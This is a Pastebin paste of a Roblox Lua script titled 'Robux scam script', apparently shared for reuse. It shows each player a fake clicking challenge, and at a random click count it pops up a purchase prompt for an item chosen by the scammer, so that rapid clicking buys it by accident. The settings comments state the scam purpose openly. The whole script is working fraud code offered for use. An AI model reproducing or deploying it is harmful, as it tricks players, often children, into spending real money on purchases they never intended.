Advertisement
naser2345

Robux scam script --LEAKED

Jan 3rd, 2018
1,912
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.21 KB | None | 0 0
  1. --------------------------This is an Official script from Duelist--------------------------
  2. ---{-------------------- -------------------}---
  3. ---{-------------------- / \ -------------------}---
  4. ---{-------------------- II -------------------}---
  5. ---{-------------------- II -------------------}---
  6. ---{-------------------- II -------------------}---
  7. ---{-------------------- A========A -------------------}---
  8. ---{-------------------- II -------------------}---
  9. ---{-------------------- II -------------------}---
  10. ---{-------------------- W -------------------}---
  11. -------------------------------------------------------------------------------------------------------------
  12. --Credit to PPATTA
  13. --// Settings
  14. timer = 30 -- Length of each game
  15. sellAt = math.random(16,21) -- Number of clicks at which the item is sold
  16. sellID = 524860279 -- ID of the item you want to sell to the user
  17. sellDevProduct = false -- If you want to scam with a developer product
  18. donateEnabled = true -- If the GUI should have a donate button
  19. donateID = 1001148463 -- ID of the item you want the user to buy to donate
  20. donateDevProduct = false -- If you want donations to be a developer product
  21. --\\ End of settings
  22.  
  23. for _,plr in pairs(game.Players:GetPlayers()) do
  24. pcall(function()
  25. local PlayerGUI = plr:FindFirstChildOfClass("PlayerGui")
  26. if PlayerGUI == nil or PlayerGUI:FindFirstChild("ClickerGUI") then
  27. return
  28. end
  29. local ClickerGUI = Instance.new("ScreenGui")
  30. local ClickerFrame = Instance.new("ImageLabel")
  31. local ClickButton1 = Instance.new("ImageButton")
  32. local ButtonText = Instance.new("TextLabel")
  33. local Challenge = Instance.new("TextLabel")
  34. local Title = Instance.new("TextLabel")
  35. local HighScore = Instance.new("TextLabel")
  36. local Timer = Instance.new("TextLabel")
  37. local Clicks = Instance.new("TextLabel")
  38. local DonateButton = Instance.new("ImageButton")
  39. local ButtonText_2 = Instance.new("TextLabel")
  40. local ClickButton2 = Instance.new("ImageButton")
  41. local ButtonText_3 = Instance.new("TextLabel")
  42. ClickerGUI.Name = "ClickerGUI"
  43. ClickerGUI.ResetOnSpawn = false
  44. ClickerFrame.Name = "ClickerFrame"
  45. ClickerFrame.Parent = ClickerGUI
  46. ClickerFrame.BackgroundTransparency = 1
  47. ClickerFrame.Position = UDim2.new(0.5, -162, 0.5, -90)
  48. ClickerFrame.Size = UDim2.new(0, 324, 0, 180)
  49. ClickerFrame.ZIndex = 8
  50. ClickerFrame.Image = "rbxasset://textures/ui/LoadingBKG.png"
  51. ClickButton1.Name = "ClickButton1"
  52. ClickButton1.Parent = ClickerFrame
  53. ClickButton1.BackgroundTransparency = 1
  54. ClickButton1.Position = UDim2.new(0, 2, 0, 136)
  55. ClickButton1.Size = UDim2.new(0, 320, 0, 44)
  56. ClickButton1.ZIndex = 9
  57. ClickButton1.AutoButtonColor = false
  58. ClickButton1.Modal = true
  59. ClickButton1.Image = "rbxasset://textures/ui/SingleButton.png"
  60. ButtonText.Name = "ButtonText"
  61. ButtonText.Parent = ClickButton1
  62. ButtonText.BackgroundTransparency = 1
  63. ButtonText.Size = UDim2.new(1, 0, 1, 0)
  64. ButtonText.ZIndex = 10
  65. ButtonText.Font = Enum.Font.SourceSansBold
  66. ButtonText.FontSize = Enum.FontSize.Size24
  67. ButtonText.Text = "Start"
  68. ButtonText.TextColor3 = Color3.new(1, 1, 1)
  69. ButtonText.TextSize = 24
  70. Challenge.Name = "Challenge"
  71. Challenge.Parent = ClickerFrame
  72. Challenge.BackgroundTransparency = 1
  73. Challenge.Position = UDim2.new(0, 10, 0, 100)
  74. Challenge.Size = UDim2.new(1, -20, 0, 30)
  75. Challenge.ZIndex = 10
  76. Challenge.Font = Enum.Font.SourceSansItalic
  77. Challenge.FontSize = Enum.FontSize.Size24
  78. Challenge.Text = "Try to get 100 clicks in 30 seconds!"
  79. Challenge.TextColor3 = Color3.new(1, 1, 1)
  80. Challenge.TextSize = 24
  81. Challenge.TextWrapped = true
  82. Title.Name = "Title"
  83. Title.Parent = ClickerFrame
  84. Title.BackgroundTransparency = 1
  85. Title.Position = UDim2.new(0, 10, 0, 15)
  86. Title.Size = UDim2.new(1, -20, 0, 30)
  87. Title.ZIndex = 10
  88. Title.Font = Enum.Font.SourceSansBold
  89. Title.FontSize = Enum.FontSize.Size24
  90. Title.Text = "How many times can you click to win?"
  91. Title.TextColor3 = Color3.new(1, 1, 1)
  92. Title.TextSize = 24
  93. Title.TextWrapped = true
  94. HighScore.Name = "HighScore"
  95. HighScore.Parent = ClickerFrame
  96. HighScore.BackgroundTransparency = 1
  97. HighScore.Position = UDim2.new(0, 10, 0, 70)
  98. HighScore.Size = UDim2.new(1, -20, 0, 30)
  99. HighScore.ZIndex = 10
  100. HighScore.Font = Enum.Font.SourceSans
  101. HighScore.FontSize = Enum.FontSize.Size24
  102. HighScore.Text = "High Score: 0 Clicks"
  103. HighScore.TextColor3 = Color3.new(1, 1, 1)
  104. HighScore.TextSize = 24
  105. HighScore.TextWrapped = true
  106. Timer.Name = "Timer"
  107. Timer.Parent = ClickerFrame
  108. Timer.BackgroundTransparency = 1
  109. Timer.Position = UDim2.new(0, 20, 0, 40)
  110. Timer.Size = UDim2.new(1, -40, 0, 30)
  111. Timer.ZIndex = 10
  112. Timer.Font = Enum.Font.SourceSans
  113. Timer.FontSize = Enum.FontSize.Size24
  114. Timer.Text = "30s"
  115. Timer.TextColor3 = Color3.new(1, 1, 1)
  116. Timer.TextSize = 24
  117. Timer.TextWrapped = true
  118. Timer.TextXAlignment = Enum.TextXAlignment.Left
  119. Clicks.Name = "Clicks"
  120. Clicks.Parent = ClickerFrame
  121. Clicks.BackgroundTransparency = 1
  122. Clicks.Position = UDim2.new(0, 20, 0, 40)
  123. Clicks.Size = UDim2.new(1, -40, 0, 30)
  124. Clicks.ZIndex = 10
  125. Clicks.Font = Enum.Font.SourceSans
  126. Clicks.FontSize = Enum.FontSize.Size24
  127. Clicks.Text = "0 Clicks"
  128. Clicks.TextColor3 = Color3.new(1, 1, 1)
  129. Clicks.TextSize = 24
  130. Clicks.TextWrapped = true
  131. Clicks.TextXAlignment = Enum.TextXAlignment.Right
  132. DonateButton.Name = "DonateButton"
  133. DonateButton.Parent = ClickerFrame
  134. DonateButton.BackgroundTransparency = 1
  135. DonateButton.Position = UDim2.new(0.5, 0, 0, 136)
  136. DonateButton.Size = UDim2.new(0, 162, 0, 44)
  137. DonateButton.Visible = false
  138. DonateButton.ZIndex = 9
  139. DonateButton.AutoButtonColor = false
  140. DonateButton.Modal = true
  141. DonateButton.Image = "rbxasset://textures/ui/ButtonRight.png"
  142. ButtonText_2.Name = "ButtonText"
  143. ButtonText_2.Parent = DonateButton
  144. ButtonText_2.BackgroundTransparency = 1
  145. ButtonText_2.Size = UDim2.new(1, 0, 1, 0)
  146. ButtonText_2.ZIndex = 10
  147. ButtonText_2.Font = Enum.Font.SourceSans
  148. ButtonText_2.FontSize = Enum.FontSize.Size24
  149. ButtonText_2.Text = "Donate"
  150. ButtonText_2.TextColor3 = Color3.new(1, 1, 1)
  151. ButtonText_2.TextSize = 24
  152. ClickButton2.Name = "ClickButton2"
  153. ClickButton2.Parent = ClickerFrame
  154. ClickButton2.BackgroundTransparency = 1
  155. ClickButton2.Position = UDim2.new(0, 0, 0, 136)
  156. ClickButton2.Size = UDim2.new(0, 162, 0, 44)
  157. ClickButton2.Visible = false
  158. ClickButton2.ZIndex = 9
  159. ClickButton2.AutoButtonColor = false
  160. ClickButton2.Modal = true
  161. ClickButton2.Image = "rbxasset://textures/ui/ButtonLeft.png"
  162. ButtonText_3.Name = "ButtonText"
  163. ButtonText_3.Parent = ClickButton2
  164. ButtonText_3.BackgroundTransparency = 1
  165. ButtonText_3.Size = UDim2.new(1, 0, 1, 0)
  166. ButtonText_3.ZIndex = 10
  167. ButtonText_3.Font = Enum.Font.SourceSansBold
  168. ButtonText_3.FontSize = Enum.FontSize.Size24
  169. ButtonText_3.Text = "Start"
  170. ButtonText_3.TextColor3 = Color3.new(1, 1, 1)
  171. ButtonText_3.TextSize = 24
  172. local started = false
  173. local currentTime = timer
  174. local clicks = 0
  175. local highScore = clicks
  176. local clickButton = ClickButton1
  177. Timer.Text = timer.."s"
  178. if donateEnabled == true then
  179. ClickButton1:Destroy()
  180. clickButton = ClickButton2
  181. clickButton.Visible = true
  182. DonateButton.Visible = true
  183. DonateButton.MouseEnter:connect(function()
  184. DonateButton.Image = "rbxasset://textures/ui/ButtonRightDown.png"
  185. end)
  186. DonateButton.MouseLeave:connect(function()
  187. DonateButton.Image = "rbxasset://textures/ui/ButtonRight.png"
  188. end)
  189. DonateButton.MouseButton1Click:connect(function()
  190. if donateDevProduct == true then
  191. game:GetService("MarketplaceService"):PromptProductPurchase(plr,donateID)
  192. else
  193. game:GetService("MarketplaceService"):PromptPurchase(plr,donateID)
  194. end
  195. end)
  196. else
  197. ClickButton2:Destroy()
  198. DonateButton:Destroy()
  199. end
  200. clickButton.MouseEnter:connect(function()
  201. if clickButton.Name == "ClickButton2" then
  202. clickButton.Image = "rbxasset://textures/ui/ButtonLeftDown.png"
  203. else
  204. clickButton.Image = "rbxasset://textures/ui/SingleButtonDown.png"
  205. end
  206. end)
  207. clickButton.MouseLeave:connect(function()
  208. if clickButton.Name == "ClickButton2" then
  209. clickButton.Image = "rbxasset://textures/ui/ButtonLeft.png"
  210. else
  211. clickButton.Image = "rbxasset://textures/ui/SingleButton.png"
  212. end
  213. end)
  214. clickButton.MouseButton1Click:connect(function()
  215. if started == false then
  216. started = true
  217. clicks = 0
  218. clickButton.ButtonText.Font = "SourceSans"
  219. Clicks.Text = clicks.." Clicks"
  220. Timer.Text = timer.."s"
  221. clickButton.ButtonText.Text = "Click"
  222. for i = timer,0,-1 do
  223. wait(1)
  224. currentTime = i
  225. Timer.Text = currentTime.."s"
  226. end
  227. clickButton.ButtonText.Font = "SourceSansBold"
  228. clickButton.ButtonText.Text = "Game Over"
  229. wait(2)
  230. clickButton.ButtonText.Text = "Restart"
  231. started = false
  232. elseif currentTime > 0 then
  233. clicks = clicks+1
  234. Clicks.Text = clicks.." Clicks"
  235. if clicks == sellAt then
  236. if sellDevProduct == true then
  237. game:GetService("MarketplaceService"):PromptProductPurchase(plr,sellID)
  238. else
  239. game:GetService("MarketplaceService"):PromptPurchase(plr,sellID)
  240. end
  241. end
  242. if clicks > highScore then
  243. highScore = clicks
  244. HighScore.Text = "High Score: "..highScore.." Clicks"
  245. end
  246. end
  247. end)
  248. ClickerGUI.Parent = PlayerGUI
  249. end)
  250. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement